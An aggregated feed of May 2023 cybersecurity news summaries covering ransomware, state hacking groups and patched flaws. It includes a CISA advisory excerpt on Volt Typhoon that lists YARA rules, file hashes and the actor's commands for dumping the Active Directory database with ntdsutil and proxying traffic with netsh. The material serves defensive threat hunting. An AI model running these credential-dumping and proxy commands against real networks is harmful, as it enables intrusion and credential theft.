                At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack. Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "The infected "

                Autosummary: Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456. "


                The US government sanctioned four entities and one individual for supporting cyber operations conducted by North Korea

                government
                2023-05-24 https://securityaffairs.com/146611/cyber-warfare-2/us-santioned-north-korea-entities.html

                The US Department of the Treasury sanctioned four entities and one individual for their role in cyber operations conducted by North Korea. The US Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced sanctions against four entities and one individual for their role in malicious cyber operations conducted to support the government of […]

                The post The US government sanctioned four entities and one individual for supporting cyber operations conducted by North Korea appeared first on Security Affairs.

                "

                Autosummary: “These workers deliberately obfuscate their identities, locations, and nationalities, typically using fake personas, proxy accounts, stolen identities, and falsified or forged documentation to apply for jobs at these companies.” “Applications and software developed by DPRK IT workers span a range of fields and sectors, including business, health and fitness, social networking, sports, entertainment, and lifestyle.” "


                Colombian plane crash: New clues found in search for lost children

                latam
                2023-05-24 https://www.bbc.co.uk/news/world-latin-america-65699761?at_medium=RSS&at_campaign=KARANGA
                It comes more than three weeks after their plane crashed in the Colombian jungle, killing all adults on board. "

                Autosummary: "


                New PowerExchange malware backdoors Microsoft Exchange servers

                exploits
                2023-05-24 https://www.bleepingcomputer.com/news/security/new-powerexchange-malware-backdoors-microsoft-exchange-servers/
                A new PowerShell-based malware dubbed PowerExchange was used in attacks linked to APT34 Iranian state hackers to backdoor on-premise Microsoft Exchange servers. [...] "

                Autosummary: "


                Barracuda Email Security Gateway (ESG) hacked via zero-day bug

                exploits
                2023-05-24 https://securityaffairs.com/146620/hacking/barracuda-email-security-gateway-bug.html

                Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were breached exploiting a zero-day vulnerability. Network security solutions provider Barracuda warned customers that some of its Email Security Gateway (ESG) appliances were recently breached by threat actors exploiting a now-patched zero-day vulnerability. The vulnerability, tracked as CVE-2023-2868, resides in the module for […]

                The post Barracuda Email Security Gateway (ESG) hacked via zero-day bug appeared first on Security Affairs.

                "

                Autosummary: "


                Hackers target 1.5M WordPress sites with cookie consent plugin exploit

                exploits
                2023-05-24 https://www.bleepingcomputer.com/news/security/hackers-target-15m-wordpress-sites-with-cookie-consent-plugin-exploit/
                Ongoing attacks are targeting an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability in a WordPress cookie consent plugin named Beautiful Cookie Consent Banner with more than 40,000 active installs. [...] "

                Autosummary: "


                Rheinmetall attacked by BlackBasta ransomware

                exploits ransomware
                2023-05-24 https://www.malwarebytes.com/blog/news/2023/05/blackbasta-ransomware-throws-wrench-in-rheinmetall-arms-production

                Categories: News

                Categories: Ransomware

                Tags: Rheinmetall

                Tags: BlackBasta

                Tags: ransomware

                A cyberattack on arms manufacturer Rheinmetall has been claimed by the BlackBasta ransomware group on its leak site.

                The post Rheinmetall attacked by BlackBasta ransomware appeared first on Malwarebytes Labs.

                "

                Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. After the data is copied, the ransomware encrypts files and gives them the ".basta" extension, erases volume shadow copies, and presents a ransom note named readme.txt on affected devices. [Figure: Monthly ransomware attacks in Germany with LockBit and Black Basta highlighted, April 2022 - March 2023] BlackBasta is not very different from other ransomware groups in the way it operates. "


                Tracking down a trojan: An inside look at threat hunting in a corporate network

                exploits
                2023-05-24 https://www.malwarebytes.com/blog/business/2023/05/tracking-down-a-trojan-an-inside-look-at-threat-hunting-in-a-corporate-network

                Categories: Business

                How Malwarebytes MDR successfully helped a company detect and respond to the potent banking Trojan QBot.

                The post Tracking down a trojan: An inside look at threat hunting in a corporate network appeared first on Malwarebytes Labs.

                "

                Autosummary: (Source: BleepingComputer) Once someone in the email chain opens the attached PDF, they see a message saying, "This document contains protected files, to display them, click on the "open" button." QBot is notorious for its abilities to steal sensitive information, like login credentials, financial data, and personal information, and even create backdoors for additional malware to infiltrate the compromised system. However, the Malwarebytes MDR team promptly detected and contained this threat, taking steps such as cleaning the system of the infection, informing Company 1 of the incident, and providing actionable recommendations to prevent future compromises. "


                Webinar alert: How Coffee County Schools safeguards 7500 students and 1200 staff

                government
                2023-05-24 https://www.malwarebytes.com/blog/business/2023/05/webinar-alert-byte-into-security-how-coffee-county-schools-safeguards-7500-students-and-1200-staff

                Categories: Business

                Join our upcoming Byte into Security webinar for a deep dive into K-12 cybersecurity.

                The post Webinar alert: How Coffee County Schools safeguards 7500 students and 1200 staff appeared first on Malwarebytes Labs.

                "

                Autosummary: Here's what you can expect from this dialogue: An in-depth understanding of the hurdles faced by Coffee County Schools, in particular a stringent security audit. "


                CISA updates ransomware guidance

                exploits ransomware
                2023-05-24 https://www.malwarebytes.com/blog/news/2023/05/cisa-updates-stopransomware-guide

                Categories: News

                Categories: Ransomware

                Tags: CISA

                Tags: StopRansomware

                Tags: guide

                Tags: ZTA

                Tags: compromised

                Tags: cloud

                Tags: MDR

                CISA has updated its #StopRansomware guide to account for changes in ransomware tactics and techniques.

                The post CISA updates ransomware guidance appeared first on Malwarebytes Labs.

                "

                Autosummary: The #StopRansomware guide is set up as a one-stop resource to help organizations reduce the risk of ransomware incidents through best practices to detect, prevent, respond, and recover from them, including step-by-step approaches to address potential attacks. Look for anomalous usage of built-in Windows tools such as bcdedit.exe, fsutil.exe (deletejournal), vssadmin.exe, wbadmin.exe, and wmic.exe (shadowcopy or shadowstorage). Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Consider employing password-less MFA that replaces passwords with two or more verification factors (e.g., a fingerprint, facial recognition, device pin, or a cryptographic key). "


                Online scams target bargain-hunting holiday travelers

                financial
                2023-05-23 https://www.helpnetsecurity.com/2023/05/23/online-travel-scams/

                30% of adults have fallen victim or know someone who has fallen victim to an online scam while trying to save money when booking travel, according to McAfee. 34% of those who had money stolen have lost over $1,000 before their trip has even begun, while 66% lost up to $1,000. Too good to be true 62% of all vacationers will travel domestically this year and 42% will do so internationally. With inflation and the … More

                The post Online scams target bargain-hunting holiday travelers appeared first on Help Net Security.

                "

                Autosummary: In today’s economic environment, adults are more likely to seek out a bargain deal online (56%), move quickly to snap up a deal (45%), try a new booking site (35%) and even a new destination (36%), in order to save money. While social media is by far the most common online activity for people to use their phones for while on vacation (60%), also common are chatting with friends and family (55%), online banking (35%) and sending money via apps such as PayPal or Venmo (22%). "


                China Bans U.S. Chip Giant Micron, Citing "Serious Cybersecurity Problems"

                ciber
                2023-05-23 https://thehackernews.com/2023/05/china-bans-us-chip-giant-micron-citing.html
                China has banned U.S. chip maker Micron from selling its products to Chinese companies working on key infrastructure projects, citing national security risks. The development comes nearly two months after the country's cybersecurity authority initiated a probe in late March 2023 to assess potential network security risks. "The purpose of this network security review of Micron's products is to "

                Autosummary: "


                BlackCat Ransomware affiliate uses signed kernel driver to evade detection

                exploits ransomware
                2023-05-23 https://securityaffairs.com/146536/malware/blackcat-ransomware-uses-kernel-driver.html

                Experts spotted the ALPHV/BlackCat ransomware group using signed malicious Windows kernel drivers to evade detection. Trend Micro researchers shared details about an ALPHV/BlackCat ransomware incident that took place in February 2023. A BlackCat affiliate employed signed malicious Windows kernel drivers to evade detection. Experts believe the driver is a new version of the malware reported in December 2022 […]

                The post BlackCat Ransomware affiliate uses signed kernel driver to evade detection appeared first on Security Affairs.

                "

                Autosummary: Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Blackcat ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Bird flu: Brazil declares animal health emergency after several cases found

                latam
                2023-05-23 https://www.bbc.co.uk/news/world-latin-america-65679328?at_medium=RSS&at_campaign=KARANGA
                The country is the world's largest exporter of chicken meat, and wants to stop the virus spreading.


                New WinTapix.sys Malware Engages in Multi-Stage Attack Across Middle East

                exploits
                2023-05-23 https://thehackernews.com/2023/05/new-wintapixsys-malware-engages-in.html
                An unknown threat actor has been observed leveraging a malicious Windows kernel driver in attacks likely targeting the Middle East since at least May 2020. Fortinet Fortiguard Labs, which dubbed the artifact WINTAPIX (WinTapix.sys), attributed the malware with low confidence to an Iranian threat actor. "WinTapix.sys is essentially a loader," security researchers Geri Revay and Hossein Jazi said

                Autosummary: In other words, it offers a stealthy way to infiltrate deeper into the targeted system, maintain persistence, and execute additional payloads or commands as part of the threat actor's multi-stage attack.


                Arms maker Rheinmetall confirms BlackBasta ransomware attack

                exploits ransomware
                2023-05-23 https://www.bleepingcomputer.com/news/security/arms-maker-rheinmetall-confirms-blackbasta-ransomware-attack/
                German automotive and arms manufacturer Rheinmetall AG confirms that it suffered a BlackBasta ransomware attack that impacted its civilian business. [...]

                Autosummary: Rheinmetall is a German manufacturer of automotive, military vehicles, armaments, air defense systems, engines, and various steel products, which employs over 25,000 people and has an annual revenue of over $7 billion.


                IT employee impersonates ransomware gang to extort employer

                exploits ransomware
                2023-05-23 https://www.bleepingcomputer.com/news/security/it-employee-impersonates-ransomware-gang-to-extort-employer/
                A 28-year-old United Kingdom man from Fleetwood, Hertfordshire, has been convicted of unauthorized computer access with criminal intent and blackmailing his employer. [...]


                New AhRat Android malware hidden in app with 50,000 installs

                exploits
                2023-05-23 https://www.bleepingcomputer.com/news/security/new-ahrat-android-malware-hidden-in-app-with-50-000-installs/
                ESET malware researchers have discovered a new remote access trojan (RAT) on the Google Play Store, bundled with an Android screen recording app with 50,000 installs. [...]

                Autosummary: It has a wide range of capabilities, including but not limited to tracking infected devices' location, stealing call logs, contacts, and text messages, sending SMS messages, taking pictures, and recording background audio.


                Cuba ransomware claims cyberattack on Philadelphia Inquirer

                exploits ransomware ciber
                2023-05-23 https://www.bleepingcomputer.com/news/security/cuba-ransomware-claims-cyberattack-on-philadelphia-inquirer/
                The Cuba ransomware gang has claimed responsibility for this month's cyberattack on The Philadelphia Inquirer, which temporarily disrupted the newspaper's distribution and disrupted some business operations. [...]

                Autosummary: The stolen data, now publicly released on Cuba's extortion portal, includes financial documents, correspondence with bank employees, account movements, balance sheets, tax documents, compensation, and source code.


                Fusion Risk Management TPRM enhancements deliver continuous monitoring of third parties

                ransomware
                2023-05-23 https://www.helpnetsecurity.com/2023/05/23/fusion-risk-management-tprm/

                Fusion Risk Management announced expanded functionality of its third-party risk management (TPRM) offering. The enhanced solution delivers continuous monitoring of third parties beyond its traditional instance as well as an evaluation of potential operational and business impacts that those third parties may have. This functionality enables a holistic and real-time view of third-party ecosystem health which improves decision-making and response times in order to transform how third-party risk teams anticipate and manage disruptions. Organizations continue … More

                The post Fusion Risk Management TPRM enhancements deliver continuous monitoring of third parties appeared first on Help Net Security.

                "

                Autosummary: “Fusion continues to invest in product innovation to ensure that our customers have the most accurate understanding of third-party impacts across their enterprise, can accelerate real-time intelligence, can make the shift to a proactive risk management posture, and are able to thrive through any business disruption,” concluded Jackson. "


                Conceal and White Rock Cybersecurity partner to isolate browsing sessions

                ciber
                2023-05-23 https://www.helpnetsecurity.com/2023/05/23/conceal-white-rock-cybersecurity/

                Conceal has announced a new strategic partnership with White Rock Cybersecurity. “White Rock Cybersecurity is committed to delivering innovative, scalable, and manageable solutions in information technology,” said James Range, CEO of White Rock Cybersecurity. “With the inclusion of Conceal’s Zero Trust isolation technology in our offerings, we are significantly boosting the defense capabilities of our customers against both existing and emerging cyber threats at the edge,” Range added. ConcealBrowse, Conceal’s flagship product, is a browser … More

                The post Conceal and White Rock Cybersecurity partner to isolate browsing sessions appeared first on Help Net Security.

                "

                Autosummary: "


                GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments

                government
                2023-05-23 https://thehackernews.com/2023/05/goldenjackal-new-threat-group-targeting.html
                Government and diplomatic entities in the Middle East and South Asia are the target of a new advanced persistent threat actor named GoldenJackal. Russian cybersecurity firm Kaspersky, which has been keeping tabs on the group's activities since mid-2020, characterized the adversary as both capable and stealthy. The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq,

                Autosummary: The targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.


                North Korean Kimsuky Hackers Strike Again with Advanced Reconnaissance Malware

                exploits
                2023-05-23 https://thehackernews.com/2023/05/north-korean-kimsuky-hackers-strike.html
                The North Korean advanced persistent threat (APT) group known as Kimsuky has been observed using a piece of custom malware called RandomQuery as part of a reconnaissance and information exfiltration operation. "Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," SentinelOne researchers Aleksandar Milenkoski and Tom

                Autosummary: The malware then proceeds to harvest system metadata, running processes, installed applications, and files from different folders, all of which are transmitted back to the command-and-control (C2) server.


                Google announced its Mobile VRP (vulnerability rewards program)

                exploits
                2023-05-23 https://securityaffairs.com/146578/security/google-mobile-vrp.html

                Google introduced Mobile VRP (vulnerability rewards program), a new bug bounty program for reporting vulnerabilities in its mobile applications. Google announced a new bug bounty program, named Mobile VRP (vulnerability rewards program), that covers its mobile applications. Google’s Mobile VRP is a bug bounty program for reporting vulnerabilities in first-party Android applications developed or maintained […]

                The post Google announced its Mobile VRP (vulnerability rewards program) appeared first on Security Affairs.

                "

                Autosummary: Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, bug bounty) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                German arms manufacturer Rheinmetall suffered Black Basta ransomware attack

                exploits ransomware industry
                2023-05-23 https://securityaffairs.com/146571/cyber-crime/rheinmetall-black-basta-ransomware-attack.html

                The German automotive and arms manufacturer Rheinmetall announced it was the victim of a Black Basta ransomware attack that took place last month. Rheinmetall is a German automotive and arms manufacturer that is listed on the Frankfurt stock exchange. The company this week announced it was the victim of a ransomware attack conducted by the Black Basta ransomware group. The incident took place […]

                The post German arms manufacturer Rheinmetall suffered Black Basta ransomware attack appeared first on Security Affairs.

                "

                Autosummary: Nominate Pierluigi Paganini and Security Affairs here here: https://docs.google.com/forms/d/e/1FAIpQLSepvnj8b7QzMdLh7vWEDQDqohjBUsHyn3x3xRdYGCetwVy2DA/viewform Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Balck Basta) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Delinea Cloud Suite updates reduce the risk of lateral movement in cybersecurity breaches

                ciber
                2023-05-23 https://www.helpnetsecurity.com/2023/05/23/delinea-cloud-suite-updates/

                Delinea announced the latest version of Cloud Suite, part of its Server PAM solution, which provides privileged access to and authorization for servers. Delinea Cloud Suite updates include more granular support for just-in-time (JIT) and just-enough privilege access automation, and improved identity assurance through enforced human interaction when prompted for multi-factor authentication (MFA) at server log-in or privilege elevation. A 30-day study conducted by VMware revealed that almost 45% of intrusions also included a lateral … More

                The post Delinea Cloud Suite updates reduce the risk of lateral movement in cybersecurity breaches appeared first on Help Net Security.

                "

                Autosummary: "


                GoldenJackal state hackers silently attacking govts since 2019

                government
                2023-05-23 https://www.bleepingcomputer.com/news/security/goldenjackal-state-hackers-silently-attacking-govts-since-2019/
                A relatively unknown advanced persistent threat (APT) group named "GoldenJackal" has been targeting government and diplomatic entities in Asia since 2019 for espionage. [...]

                Autosummary: Rich custom "Jackal" toolset. According to Kaspersky, GoldenJackal employs a set of custom .NET malware tools that provide various functions, including credential dumping, data stealing, malware loading, lateral movement, file exfiltration, and more. Kaspersky has been tracking GoldenJackal since 2020, and today reports that the threat actors have had notable activity in Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey.


                Employee guilty of joining ransomware attack on his own company

                exploits ransomware
                2023-05-23 https://www.malwarebytes.com/blog/news/2023/05/employee-pleads-guilty-to-blackmail-and-unauthorized-access-after-5-years

                Categories: News

                Categories: Ransomware

                Tags: employee

                Tags: insider threat

                Tags: access control

                Tags: policy

                Tags: ransom

                An employee who tried to take advantage of a ransomware attack on his own company has pleaded guilty after 5 years of denying he had anything to do with it.

                The post Employee guilty of joining ransomware attack on his own company appeared first on Malwarebytes Labs.

                "

                Autosummary: The unauthorized access to the emails could be traced back to his home address, which gave the police sufficient grounds to seize a computer, laptop, phone, and a USB stick.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files. "


                Update now! Apple issues patches for three actively used zero-days

                exploits
                2023-05-23 https://www.malwarebytes.com/blog/news/2023/05/update-now-apple-issued-patches-for-three-actively-used-zero-days

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Apple

                Tags: RSR

                Tags: CVE-2023-32409

                Tags: CVE-2023-28204

                Tags: CVE-2023-32373

                Tags: out of bounds

                Tags: use after free

                Apple issued information about patches against three actively exploited zero-days in WebKit. One vulnerability is new, two were patched earlier this month.


                The post Update now! Apple issues patches for three actively used zero-days appeared first on Malwarebytes Labs.

                "

                Autosummary: Apple has rolled out security updates for Safari 16.5, watchOS 9.5, tvOS 16.5, iOS 16.5, iPadOS 16.5, iOS 15.7.6, iPadOS 15.7.6, macOS Big Sur 11.7.7, macOS Ventura 13.4, and macOS Monterey 12.6.6. iPhone 6s and later models Mac workstations and laptops running macOS, Big Sur, Monterey, and Ventura Apple Watch (series 4 and later) Apple TV 4K and HD "


                People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection

                government
                2023-05-23 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

                Summary

                The United States and international cybersecurity authorities are issuing this joint Cybersecurity Advisory (CSA) to highlight a recently discovered cluster of activity of interest associated with a People’s Republic of China (PRC) state-sponsored cyber actor, also known as Volt Typhoon. Private sector partners have identified that this activity affects networks across U.S. critical infrastructure sectors, and the authoring agencies believe the actor could apply the same techniques against these and other sectors worldwide.

                This advisory from the United States National Security Agency (NSA), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Federal Bureau of Investigation (FBI), the Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), the Communications Security Establishment’s Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), and the United Kingdom National Cyber Security Centre (NCSC-UK) (hereafter referred to as the “authoring agencies”) provides an overview of hunting guidance and associated best practices to detect this activity.

                One of the actor’s primary tactics, techniques, and procedures (TTPs) is living off the land, which uses built-in network administration tools to perform their objectives. This TTP allows the actor to evade detection by blending in with normal Windows system and network activities, avoid endpoint detection and response (EDR) products that would alert on the introduction of third-party applications to the host, and limit the amount of activity that is captured in default logging configurations. Some of the built-in tools this actor uses are: wmic, ntdsutil, netsh, and PowerShell. The advisory provides examples of the actor’s commands along with detection signatures to aid network defenders in hunting for this activity. Many of the behavioral indi

                Autosummary: watchdogd.exe. In addition to the file names and paths above, malicious file names, believed to be randomly created, in the following format have also been discovered: C:\Windows\[a-zA-Z]{8}.exe

                Associated file hashes:
                f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
                ef09b8ff86c276e9b475a6ae6b54f08ed77e09e169f7fc0872eb1d427ee27d31
                d6ebde42457fe4b2a927ce53fc36f465f0000da931cfab9b79a36083e914ceca
                472ccfb865c81704562ea95870f60c08ef00bcd2ca1d7f09352398c05be5d05d
                66a19f7d2547a8a85cee7a62d0b6114fd31afdee090bd43f36b89470238393d7
                3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71
                41e5181b9553bbe33d91ee204fe1d2ca321ac123f9147bb475c0ed32f9488597
                c7fee7a3ffaf0732f42d89c4399cbff219459ae04a81fc6eff7050d53bd69b99
                3a9d8bb85fbcfe92bae79d5ab18e4bca9eaf36cea70086e8d1ab85336c83945f
                fe95a382b4f879830e2666473d662a24b34fccf34b6b3505ee1b62b32adafa15
                ee8df354503a56c62719656fae71b3502acf9f87951c55ffd955feec90a11484

                In some cases, the following user-agent string (including the extra spacing) was identified performing reconnaissance activities by this actor: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0

                YARA rules provided in the advisory:

                rule ShellJSP {
                    strings:
                        $s1 = "decrypt(fpath)"
                        $s2 = "decrypt(fcontext)"
                        $s3 = "decrypt(commandEnc)"
                        $s4 = "upload failed!"
                        $s5 = "aes.encrypt(allStr)"
                        $s6 = "newid"
                    condition:
                        filesize < 50KB and 4 of them
                }

                rule EncryptJSP {
                    strings:
                        $s1 = "AEScrypt"
                        $s2 = "AES/CBC/PKCS5Padding"
                        $s3 = "SecretKeySpec"
                        $s4 = "FileOutputStream"
                        $s5 = "getParameter"
                        $s6 = "new ProcessBuilder"
                        $s7 = "new BufferedReader"
                        $s8 = "readLine()"
                    condition:
                        filesize < 50KB and 6 of them
                }

                rule CustomFRPClient {
                    meta:
                        description = "Identify instances of the actor's custom FRP tool based on unique strings chosen by the actor and included in the tool"
                    strings:
                        $s1 = "%!PS-Adobe-" nocase ascii wide
                        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide
                        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide
                        $s4 = "MAGA2024!!!"

                A further rule fragment whose header was not preserved in the extracted text:
                        PS-Adobe-" nocase ascii wide
                        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide
                        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide
                        $s4 = "HTTP_PROXYHost: %s" nocase ascii wide
                    condition:
                        3 of them
                }

                [T1090] to ports 8080, 8443, 8043, 8000, and 10443 with various filenames including, but not limited to: cisco_up.exe, cl64.exe, vm3dservice.exe, watchdogd.exe, Win.exe, WmiPreSV.exe, and WmiPrvSE.exe.

                In addition to the above TTPs used by the actor to copy the ntds.dit file, the following tools could be used by an actor to obtain the same information: Secretsdump.py (Note: This script is a component of Impacket, which the actor has been known to use), Invoke-NinjaCopy (PowerShell), DSInternals (PowerShell), FgDump, Metasploit. Best practices for securing ntds.dit include hardening Domain Controllers and monitoring event logs for ntdsutil.exe and similar process creations.

                The command uses a command prompt [T1059.003] to execute a Windows Management Instrumentation Command Line (WMIC) query, collecting information about the storage devices on the local host, including drive letter, file system (e.g., new technology file system [NTFS]), free space and drive size in bytes, and an optional volume name.

                Example actor commands from the advisory:
                ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\Pro"
                wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\"
                "cmd.exe" /c wmic process call create "cmd.exe /c mkdir C:\windows\Temp\McAfee_Logs & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\McAfee_Logs\"
                cmd.exe /Q
                /c wmic process call create "cmd.exe /c mkdir C:\Windows\Temp\tmp & ntdsutil \"ac i ntds\" ifm \"create full C:\Windows\Temp\tmp\" 1> \\127.0.0.1\ADMIN$\<timestamp value> 2>&1
                D:\{REDACTED}\xcopy C:\windows\temp\hp d:\{REDACTED}
                Get-EventLog security -instanceid 4624
                ldifde.exe -f c:\windows\temp\cisco_up.txt -p subtree
                makecab ..\backup\210829-020000.zip ..\webapps\adssp\html\Lock.lic
                move "\\<redacted>\c$\users\public\Appfile\registry\SYSTEM" ..\backup\210829-020000.zip
                netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress={REDACTED} connectport=8443 protocol=tcp
                netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=9999
                Rar.exe a –{REDACTED} c:\Windows\temp\DMBC2C61.tmp
                start-process -filepath c:\windows\temp\<filename>.bat -windowstyle hidden 1
                wmic process call create "cmd.exe /c mkdir C:\users\public\Appfile & ntdsutil \"ac i ntds\" ifm \"create full C:\users\public\Appfile\" q q
                wmic process call create "cmd.exe /c

                Resources referenced in the advisory:
                Windows Defender Firewall
                Windows management instrumentation
                Windows password spraying
                Logging and playbook configuration: https://learn.microsoft.com/en-us/security/compass/incident-response-playbook-password-spray
                CISA regional cyber threats
                PRC state-sponsored activity: China Cyber Threat Overview and Advisories
                Microsoft Threat Intelligence blog, Volt Typhoon activity: https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/
                Ntdsutil.exe
                PowerShell
                Windows command line process auditing
                Active Directory and domain controller hardening

                The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Broadcom, Cisco Talos, Google's Threat Analysis Group, Lumen Technologies, Mandiant, Microsoft Threat Intelligence (MSTI), Palo Alto Networks, SecureWorks, SentinelOne, Trellix, and additional industry partners for their collaboration on this advisory.

                Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies' governments, and this guidance shall not be used for advertising or product endorsement purposes.


                How continuous security monitoring is changing the compliance game

                ransomware
                2023-05-22 https://www.helpnetsecurity.com/2023/05/22/continuous-security-monitoring-changing-compliance-video/

                Managing compliance doesn’t have to be draining, time-consuming, or overly complicated. In this Help Net Security video, Wesley Van Zyl, Senior Manager, Compliance Success at Scytale, discusses how keeping track of all your security controls can be challenging, particularly when new cybersecurity threats emerge unexpectedly. To maintain consistent compliance and reliable monitoring, it is essential to incorporate automation technology into your compliance management system. By doing so, you can effectively mitigate the risk of human … More

                The post How continuous security monitoring is changing the compliance game appeared first on Help Net Security.

                "

                Autosummary: "


                What flying a plane can teach you about cybersecurity

                ciber
                2023-05-22 https://www.helpnetsecurity.com/2023/05/22/what-flying-a-plane-can-teach-you-about-cybersecurity/

                Before taking on the role as GM of IAI’s cyber division, Esti Peshin was a member of Israel’s parliament, wielding both legislation and regulation to strengthen the country’s renowned high-tech ecosystem. Despite her commitments, Esti shared with the Left to Our Own Devices podcast how she finds time to pilot aircraft as a source of inspiration. Where cyber security and aviation are headed Laying out the terrain of the aviation landscape “The commercial aviation ecosystem … More

                The post What flying a plane can teach you about cybersecurity appeared first on Help Net Security.

                "

                Autosummary: Capacity buildup – Training, awareness, ensuring that the people involved, who are usually the weakest link, are aware of cyber best practices. Cyber attacks against airlines and airports are already becoming commonplace, causing disruption to the commercial aviation ecosystem and creating huge delays in flying, severe economic consequences, and negative media coverage.Now, some of us speak about AGI, artificial general intelligence, mimicking the activities or the behaviors of human beings, but AGI is not quite there in terms of technology. "


                U.K. Fraudster Behind iSpoof Scam Receives 13-Year Jail Term for Cyber Crimes

                financial
                2023-05-22 https://thehackernews.com/2023/05/uk-fraudster-behind-ispoof-scam.html
                A U.K. national responsible for his role as the administrator of the now-defunct iSpoof online phone number spoofing service has been sentenced to 13 years and 4 months in prison. Tejay Fletcher, 35, of Western Gateway, London, was awarded the sentence on May 18, 2023. He pleaded guilty last month to a number of cyber offenses, including facilitating fraud and possessing and transferring

                Autosummary: According to the U.K. Metropolitan Police, the criminals assumed false identities as representatives of various banks such as Barclays, Santander, HSBC, Lloyds, Halifax, First Direct, Natwest, Nationwide, and TSB.


                KeePass Exploit Allows Attackers to Recover Master Passwords from Memory

                exploits
                2023-05-22 https://thehackernews.com/2023/05/keepass-exploit-allows-attackers-to.html
                A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances. The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early

                Autosummary: "Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdhoney," who discovered the flaw and devised a PoC, said.


                Roblox: Ten-year-old spent £2,500 of mum's money without her knowing

                financial
                2023-05-22 https://www.bbc.co.uk/news/uk-wales-65659896?at_medium=RSS&at_campaign=KARANGA
                Tesco Bank initially refused to refund the mum but changed its mind after a BBC show got involved.


                Vulnerability in Zyxel firewalls may soon be widely exploited (CVE-2023-28771)

                exploits
                2023-05-22 https://www.helpnetsecurity.com/2023/05/22/cve-2023-28771/

                A recently fixed command injection vulnerability (CVE-2023-28771) affecting a variety of Zyxel firewalls may soon be exploited in the wild, Rapid7 researchers have warned, after publishing a technical analysis and a PoC script that triggers the vulnerability and achieves a reverse root shell. About CVE-2023-28771 CVE-2023-28771 affects: Zyxel ATP, USG FLEX, and VPN firewalls running versions v4.60 to v5.35 of the ZLD firmware, and Zyxel ZyWALL/USG gateways/firewalls running ZLD v4.60 to v4.73. These firewall devices monitor … More

                The post Vulnerability in Zyxel firewalls may soon be widely exploited (CVE-2023-28771) appeared first on Help Net Security.

                "

                Autosummary: "


                CISA orders govt agencies to patch iPhone bugs exploited in attacks

                exploits
                2023-05-22 https://www.bleepingcomputer.com/news/security/cisa-orders-govt-agencies-to-patch-iphone-bugs-exploited-in-attacks/
                Today, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) ordered federal agencies to address three recently patched zero-day flaws affecting iPhones, Macs, and iPads known to be exploited in attacks. [...]


